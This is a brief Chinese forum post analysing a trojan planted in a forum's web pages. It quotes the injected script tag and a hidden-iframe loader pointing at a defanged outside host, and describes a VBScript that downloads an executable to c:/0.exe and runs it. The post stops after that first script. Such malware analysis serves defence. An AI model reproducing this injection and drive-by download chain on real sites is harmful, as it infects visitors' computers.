刚才去
某论坛上挂的东东,JPG图片 or 病毒Trojan.Win32.VB.azc?
中的论坛转了转,发现挂的马变了,瑞星报告发现:Trojan.DL.VBS.Small.ei和Hack.SuspiciousAni。
网页首部植入的代码变为:
/--- <script language=javascript src=hxxp://www**.8**8*vcd.com/htm*/china***/menu**.js></script> ---/
menu**.js 包含代码:
/--- document.writeln("<iframe src=/"hxxp:www**.8**8*vcd.com//htm*//china***//index*.htm/" width=/"100/" height=/"0/" frameborder=/"0/"><//iframe>"); ---/
index*.htm 的title居然是:“人民公社”,包含两段恶意代码。
其一是VBScript脚本,没有加密,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 d.exe,保存为 c:/0.exe,然后通过 Shell.Application 对象 Q 的 ShellExecute 方法 来运行。